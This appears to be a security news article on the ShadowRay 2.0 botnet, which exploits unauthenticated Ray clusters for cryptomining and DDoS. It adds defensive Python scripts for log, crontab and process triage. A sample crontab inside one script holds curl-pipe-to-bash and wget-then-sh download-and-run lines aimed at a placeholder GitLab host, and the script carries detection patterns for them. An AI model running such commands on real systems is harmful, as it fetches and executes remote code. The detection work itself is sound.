ShadowRay 2.0 Uses an Unpatched Ray Vulnerability to Create a Self-Spreading GPU Cryptomining Botnet

A new wave of cyber attacks has emerged as Oligo Security reports active exploitation of a long-standing security weakness in the Ray open-source AI framework. The flaw, tracked as CVE-2023-48022 with a critical CVSS score of 9.8, is being used to compromise Ray clusters equipped with NVIDIA GPUs. The compromised infrastructure is then turned into a fast-spreading cryptomining botnet known as ShadowRay 2.0.

Unpatched Flaw Enables Full Cluster Takeover

The current campaign builds on earlier activity observed between September 2023 and March 2024. Attackers abuse the missing-authentication issue in Ray to seize control of exposed instances and deploy XMRig mining operations. According to the researchers, the vulnerability remains unresolved because of a Ray design choice: the framework is expected to run only inside isolated, trusted environments.

Malicious Jobs Used for Reconnaissance and Payload Delivery

Threat actors gain control by sending malicious tasks to the unauthenticated Ray Job Submission API at "/api/jobs/". These tasks range from basic system checks to multi-step Bash and Python payloads. Once a Ray cluster is compromised, it becomes a launching point for further attacks against other exposed Ray dashboards, producing a worm-like infection that spreads from one target to the next.
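Because the Job Submission API accepts work without credentials, the most useful telemetry a defender has is the request log of whatever sits in front of the Ray Dashboard. The script below is an added example (not Oligo's tooling or code from the Ray project) that parses combined-format access-log lines, which is an assumed layout for a reverse proxy in front of the dashboard, and reports job-creation requests (POST/PUT to /api/jobs/) whose source address falls outside an allowlist of trusted networks. The log lines and the 10.0.0.0/8 allowlist are constructed for the example.

```python
import ipaddress
import re
from typing import Dict, Iterable, List

# Assumed log format: combined-log-style lines from a reverse proxy sitting in
# front of the Ray Dashboard. The field layout is an assumption for this example;
# adapt LOG_RE to whatever actually records requests in your environment.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Path of the Ray Job Submission API named in the article.
JOB_API_PREFIX = "/api/jobs"

# Methods that create or modify jobs; plain dashboard reads are not flagged here.
WRITE_METHODS = {"POST", "PUT"}


def flag_job_submissions(lines: Iterable[str], trusted_nets: List[str]) -> List[Dict]:
    """Return job-creation requests whose source address is outside trusted_nets."""
    nets = [ipaddress.ip_network(n) for n in trusted_nets]
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a production version should count these
        if m["method"] not in WRITE_METHODS or not m["path"].startswith(JOB_API_PREFIX):
            continue
        try:
            ip = ipaddress.ip_address(m["ip"])
        except ValueError:
            continue
        if any(ip in net for net in nets):
            continue
        hits.append({"ip": str(ip), "ts": m["ts"], "path": m["path"], "status": int(m["status"])})
    return hits


# Constructed sample lines (not real traffic). 10.0.0.5 stands in for an
# in-cluster client; 203.0.113.77 and 198.51.100.9 are documentation-range
# addresses standing in for untrusted internet sources.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Nov/2025:10:00:01 +0000] "GET /api/jobs/ HTTP/1.1" 200 512',
    '10.0.0.5 - - [10/Nov/2025:10:00:09 +0000] "POST /api/jobs/ HTTP/1.1" 200 88',
    '203.0.113.77 - - [10/Nov/2025:10:02:41 +0000] "GET /api/version HTTP/1.1" 200 64',
    '203.0.113.77 - - [10/Nov/2025:10:02:43 +0000] "POST /api/jobs/ HTTP/1.1" 200 88',
    '203.0.113.77 - - [10/Nov/2025:10:02:50 +0000] "GET /api/jobs/raysubmit_x1/logs HTTP/1.1" 200 2048',
    '198.51.100.9 - - [10/Nov/2025:10:05:12 +0000] "POST /api/jobs/ HTTP/1.1" 200 88',
]

TRUSTED = ["10.0.0.0/8"]  # constructed allowlist: the cluster's own network

if __name__ == "__main__":
    for hit in flag_job_submissions(SAMPLE_LOG, TRUSTED):
        print(f"{hit['ts']} job submitted from untrusted {hit['ip']} -> {hit['path']} ({hit['status']})")
```

Any hit at all means the dashboard is reachable from outside the trusted network; a 200 response to an untrusted POST is the strongest signal, since the API answered rather than rejecting the request.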

GitHub and GitLab Used for Payload Hosting

Investigators found that the attackers stored their malware in repositories with names such as "ironern440 group" and "thisisforwork440 ops" on GitHub and GitLab. Although these accounts have been removed, the group quickly created new repositories, a sign of their persistence and operational readiness.

The deployed payloads take advantage of Ray’s orchestration features to move laterally across internal nodes, open reverse shells, maintain remote access, and establish persistence through scheduled cron jobs that run every fifteen minutes. These jobs repeatedly download the latest malware build from GitLab to keep all infected hosts under control.
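The fifteen-minute cron job that re-downloads the current build is one of the more durable host-side artefacts of this activity. The following is an added example (not code from Oligo or from the Ray project) that parses a crontab and flags entries that pull content from the network, recording how often the schedule fires so a fetch every fifteen minutes or more often stands out. The sample crontab, including the gitlab.example placeholder URLs, is constructed for the example; the three regexes are the author's own heuristics, not indicators published with the report.

```python
import re
from typing import Dict, List, Set

# Heuristic indicators (assumed for this example) of a cron entry that fetches
# and runs remote content.
FETCH_RE = re.compile(r"\b(curl|wget)\b")
URL_RE = re.compile(r"https?://\S+")
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(ba)?sh\b")


def expand_minutes(field: str) -> Set[int]:
    """Expand a crontab minute field (*, */n, a-b, a,b,c, a-b/n) into the minutes it fires on."""
    minutes: Set[int] = set()
    for part in field.split(","):
        step = 1
        if "/" in part:
            part, step_text = part.split("/", 1)
            step = int(step_text)
        if part == "*":
            lo, hi = 0, 59
        elif "-" in part:
            lo, hi = (int(x) for x in part.split("-", 1))
        else:
            lo = hi = int(part)
        minutes.update(range(lo, hi + 1, step))
    return minutes


def analyze_crontab(text: str) -> List[Dict]:
    """Flag crontab entries that fetch remote content, noting how often they run."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank line, comment, or VAR=value assignment
        if line.startswith("@"):
            schedule, command = line.split(None, 1)
            runs_per_hour = 0  # @reboot/@hourly shortcuts are not expanded in this example
        else:
            fields = line.split(None, 5)
            if len(fields) < 6:
                continue  # malformed entry
            schedule, command = " ".join(fields[:5]), fields[5]
            runs_per_hour = len(expand_minutes(fields[0]))
        reasons = []
        if FETCH_RE.search(command):
            reasons.append("download tool")
        if URL_RE.search(command):
            reasons.append("remote URL")
        if PIPE_TO_SHELL_RE.search(command):
            reasons.append("piped to shell")
        if runs_per_hour >= 4:
            reasons.append("runs every 15 minutes or more often")
        # Only report entries that actually pull something from the network.
        if "download tool" in reasons or "remote URL" in reasons:
            findings.append({"schedule": schedule, "command": command,
                             "runs_per_hour": runs_per_hour, "reasons": reasons})
    return findings


# Constructed sample crontab for this example; the URLs are placeholders.
SAMPLE_CRONTAB = """\
# constructed sample, not a real artefact
PATH=/usr/local/bin:/usr/bin:/bin
0 2 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/15 * * * * curl -fsSL https://gitlab.example/placeholder-group/loader.sh | bash
30 * * * * wget -q -O /tmp/.x https://gitlab.example/placeholder-group/stage2.sh && sh /tmp/.x
"""

if __name__ == "__main__":
    for f in analyze_crontab(SAMPLE_CRONTAB):
        print(f"[{f['runs_per_hour']}/h] {f['schedule']} :: {f['command']}")
        print("   ", ", ".join(f["reasons"]))
```

Run it over `/etc/crontab`, the files under `/etc/cron.d`, and each user's crontab (`crontab -l -u <user>`); the per-user spool under `/var/spool/cron` is where a job planted through a compromised Ray worker process would normally land.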

Advanced Evasion, Region-Specific Variants and Removal of Competing Miners

Researchers Avi Lumelsky and Gal Elbaz stated that the attackers repurposed Ray's legitimate capabilities to construct a fully autonomous global cryptomining operation. Judging by its structure and code style, the malware also appears to have been partially generated with large language models.

The infection flow includes a region check for victims located in China. If the host is in that region, the botnet installs a modified variant. The malware also identifies and terminates other running miners to eliminate competition. To remain unnoticed, the malicious processes mimic legitimate Linux kernel worker tasks and cap their CPU usage at around 60 percent.
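A process that merely names itself like a kernel worker still differs from a real one in ways the kernel cannot hide: genuine kernel threads are children of kthreadd (PID 2), have no executable behind `/proc/<pid>/exe`, and have an empty command line. The script below is an added example (not Oligo's or the Ray project's code) that checks those three properties for any process with a kernel-thread-style name. `find_kthread_impostors` works on plain dictionaries so it runs on the constructed sample set; `collect_from_proc` gathers the same fields from a live Linux `/proc` for real use. The name prefixes in `KTHREAD_NAME_RE` are an assumption chosen for the example.

```python
import os
import re
from typing import Dict, List, Optional

# Names commonly carried by genuine kernel threads (prefix list assumed for this example).
KTHREAD_NAME_RE = re.compile(r"^(kworker|ksoftirqd|kthreadd|migration|rcu_|kswapd)")
KTHREADD_PID = 2  # every real kernel thread is forked by kthreadd


def find_kthread_impostors(procs: List[Dict]) -> List[Dict]:
    """Return processes with a kernel-thread name that show user-space traits."""
    findings = []
    for p in procs:
        if not KTHREAD_NAME_RE.match(p["comm"]):
            continue
        if p["pid"] == KTHREADD_PID:
            continue  # kthreadd itself is parented by PID 0
        reasons = []
        if p["ppid"] != KTHREADD_PID:
            reasons.append(f"parent is PID {p['ppid']}, not kthreadd")
        if p["exe"]:
            reasons.append(f"backed by executable {p['exe']}")
        if p["cmdline"]:
            reasons.append("has a user-space command line")
        if reasons:
            findings.append({"pid": p["pid"], "comm": p["comm"], "reasons": reasons})
    return findings


def collect_from_proc() -> List[Dict]:
    """Gather pid/ppid/comm/exe/cmdline from a live Linux /proc (run as root so exe links resolve)."""
    procs = []
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        pid = int(entry)
        try:
            with open(f"/proc/{pid}/comm") as f:
                comm = f.read().strip()
            with open(f"/proc/{pid}/status") as f:
                ppid = next(int(l.split()[1]) for l in f if l.startswith("PPid:"))
            with open(f"/proc/{pid}/cmdline", "rb") as f:
                cmdline = f.read().replace(b"\0", b" ").decode(errors="replace").strip()
        except (OSError, StopIteration):
            continue  # process exited mid-walk or is unreadable
        try:
            exe: Optional[str] = os.readlink(f"/proc/{pid}/exe")
        except OSError:
            exe = None  # kernel threads have no exe target; unprivileged reads also fail here
        procs.append({"pid": pid, "ppid": ppid, "comm": comm, "exe": exe, "cmdline": cmdline})
    return procs


# Constructed sample process table: one real kworker and one impostor.
SAMPLE_PROCS = [
    {"pid": 2, "ppid": 0, "comm": "kthreadd", "exe": None, "cmdline": ""},
    {"pid": 13, "ppid": 2, "comm": "kworker/0:1", "exe": None, "cmdline": ""},
    {"pid": 4120, "ppid": 1, "comm": "kworker/u8:2",
     "exe": "/tmp/.cache/kworker", "cmdline": "/tmp/.cache/kworker -c /tmp/.cache/cfg"},
    {"pid": 4200, "ppid": 4120, "comm": "bash", "exe": "/usr/bin/bash", "cmdline": "bash"},
]

if __name__ == "__main__":
    for f in find_kthread_impostors(SAMPLE_PROCS):
        print(f"PID {f['pid']} ({f['comm']}): " + "; ".join(f["reasons"]))
```

The CPU cap the report describes does not change any of these properties, so this check is independent of how busy the miner makes itself look; run `find_kthread_impostors(collect_from_proc())` as root on a suspect node to apply it to live processes.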

Large Attack Surface Created by Exposed Ray Servers

Although Ray is intended for use inside secured internal networks, more than 230,500 Ray servers are publicly reachable. Attackers scan these systems using the tool interact.sh to identify vulnerable dashboards.

Anyscale has introduced the Ray Open Ports Checker to help organizations verify that their clusters are safely configured. Experts also recommend tightening firewall rules and placing authorization controls in front of the default Ray Dashboard port, 8265.

Botnet Expands Into DDoS Attacks

Oligo reports that the attackers have deployed sockstress, a TCP state-exhaustion tool, through the compromised clusters. This suggests that ShadowRay 2.0 is evolving beyond cryptomining and is now also being used for denial-of-service attacks. Because port 3333 is associated with mining pools, the attacks may be aimed at disrupting rival mining operations or supporting paid DDoS services.